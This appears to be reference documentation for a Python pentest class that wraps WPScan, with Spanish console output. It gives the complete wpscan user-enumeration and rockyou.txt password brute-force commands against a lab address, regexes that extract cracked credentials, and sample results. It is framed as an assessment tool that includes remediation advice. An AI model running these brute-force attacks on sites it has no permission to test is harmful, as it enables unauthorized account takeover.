Class Definition
class WPForceBrute:
def __init__(self, host: Host)
Constructor
__init__(host)
Initializes the WPForceBrute scanner with a target host.
Host object containing IP address and open ports
host (Host): Target host instancewp_dir (Path): Output directory for WPScan results ({Config.OUTPUT_BASE}/wpscan)
Example:
wp_scanner = WPForceBrute(host)
Public Methods
attack()
Performs WordPress enumeration and brute-force attacks.
def attack(self) -> list[Vulnerability]
- Enumeration: Detect WordPress users and vulnerable plugins/themes
- Brute-Force: Dictionary attack against discovered users using rockyou.txt
List of vulnerabilities discovered:
- WordPress vulnerabilities (plugins, themes, core)
- Weak password vulnerabilities (successful brute-force)
vulns = wp_scanner.attack()
for vuln in vulns:
print(f"{vuln.name}")
print(f"Port: {vuln.port}")
print(f"Risk: {vuln.risk.value}")
print(f"Evidence: {vuln.evidence_file}")
🔓 WPScan (Enumeración + Brute-Force)...
🔍 WPScan enumerar: http://192.168.56.101:80/wordpress
👥 Usuarios encontrados: admin, editor, subscriber
🔐 Brute-force con rockyou.txt...
🔑 CREDENCIAL: admin : password123
💥 Vulnerabilidades WordPress encontradas!
WPScan Commands
Enumeration Phase
wpscan --url http://192.168.56.101:80/wordpress \
--enumerate u,vp,ap \
--no-banner \
--disable-tls-checks \
--output /output/wpscan/wpscan_192.168.56.101_80_wordpress.txt
u: Enumerate usersvp: Vulnerable pluginsap: All plugins
Timeout: 180 seconds (3 minutes)
Brute-Force Phase
wpscan --url http://192.168.56.101:80/wordpress \
--enumerate u \
--passwords /usr/share/wordlists/rockyou.txt \
--max-threads 10 \
--no-banner \
--disable-tls-checks \
--output /output/wpscan/brute_192.168.56.101_80.txt
Private Methods
_parse_wpscan_users(output)
Extracts usernames from WPScan enumeration output.
def _parse_wpscan_users(self, output: str) -> list[str]
Complete WPScan console output
List of unique usernames discovered (duplicates removed)
re.findall(r'\[!\]\s*(?:Login|Username)\s*found:\s*(\S+)', output, re.IGNORECASE)
# Matches: [!] Login found: admin
# [!] Username found: editor
re.findall(r'\|\s*(\w+)\s*\|', output)
# Matches: | admin |
# | editor |
# Filters out headers: name, id, login, slug, status
output = """
[!] Login found: admin
[!] Username found: editor
| Name | ID |
| admin | 1 |
| editor | 2 |
"""
users = wp_scanner._parse_wpscan_users(output)
print(users) # ['admin', 'editor']
_parse_brute_results(output)
Extracts successful credentials from brute-force output.
def _parse_brute_results(self, output: str) -> list[dict]
WPScan brute-force output containing success messages
List of credential dictionaries:
source (str): “WPScan Brute-Force”user (str): Usernamepassword (str): Cracked passwordhash (str): Empty string (plaintext password)
re.findall(r'SUCCESS.*?(\w+)\s*[:\|]\s*(\S+)', output, re.IGNORECASE)
# Matches: [SUCCESS] admin : password123
# SUCCESS | editor | letmein
re.findall(r'Valid Combination.*?Username:\s*(\S+).*?Password:\s*(\S+)', output, re.IGNORECASE)
# Matches: Valid Combination Found!
# Username: admin
# Password: password123
output = """
[SUCCESS] admin : password123
Valid Combination Found!
Username: editor
Password: letmein
"""
creds = wp_scanner._parse_brute_results(output)
print(creds)
# [
# {'source': 'WPScan Brute-Force', 'user': 'admin', 'password': 'password123', 'hash': ''},
# {'source': 'WPScan Brute-Force', 'user': 'editor', 'password': 'letmein', 'hash': ''}
# ]
Vulnerability Detection
WordPress Vulnerabilities
Detection Keywords:
keywords = ['vulnerable', 'critical', 'high', 'users found', 'user(s) identified']
is_vuln = any(kw in output.lower() for kw in keywords)
Vulnerability(
name="🔴 WORDPRESS VULNERABILIDADES",
description="WPScan detectó vulnerabilidades: http://target/wordpress",
port=80,
risk=RiskLevel.CRITICAL,
evidence_file="/output/wpscan/wpscan_192.168.56.101_80_wordpress.txt",
recommendations="Actualizar WordPress + Plugins, WAF, deshabilitar XML-RPC"
)
Weak Password Vulnerability
Triggered When: Brute-force successfully cracks ≥1 password
Vulnerability(
name="🔴 WORDPRESS CONTRASEÑAS DÉBILES",
description="Brute-force exitoso: 2 credenciales obtenidas",
port=80,
risk=RiskLevel.CRITICAL,
evidence_file="/output/wpscan/brute_192.168.56.101_80.txt",
recommendations="Contraseñas robustas, limitar intentos login, 2FA"
)
WordPress Path Detection
Scans common WordPress installation paths from Config.WORDPRESS_PATHS:
paths = [
'/wordpress',
'/wp',
'/blog',
'/'
]
Wordlist Configuration
Default Wordlist:
wordlist = Config.WORDLIST_PATH # /usr/share/wordlists/rockyou.txt
⚠️ Wordlist no encontrada: /usr/share/wordlists/rockyou.txt
Output Files
Directory Structure:
{Config.OUTPUT_BASE}/wpscan/
├── wpscan_192.168.56.101_80_wordpress.txt # Enumeration results
├── wpscan_192.168.56.101_80_wp.txt # Alternative path scan
└── brute_192.168.56.101_80.txt # Brute-force results
Error Handling
Timeout Handling:
try:
result = subprocess.run(cmd_enum, capture_output=True, text=True, timeout=180)
except subprocess.TimeoutExpired:
print(f" ⏭️ WPScan timeout en {url}")
try:
brute_result = subprocess.run(cmd_brute, capture_output=True, text=True, timeout=600)
except subprocess.TimeoutExpired:
print(f" ⏰ Brute-force timeout (10min)")
Integration with Host Model
Credential Storage:
Successful brute-force credentials are automatically added to the host:
creds = self._parse_brute_results(brute_result.stdout)
if creds:
self.host.credentials.extend(creds)
for c in creds:
print(f" 🔑 CREDENCIAL: {c['user']} : {c['password']}")
Dependencies
subprocess: WPScan executionre: Pattern matching for user/credential extractionpathlib.Path: File operationsconfig.Config: Configuration (paths, wordlists)models.host.Host: Host data modelmodels.vuln.Vulnerability, RiskLevel: Vulnerability tracking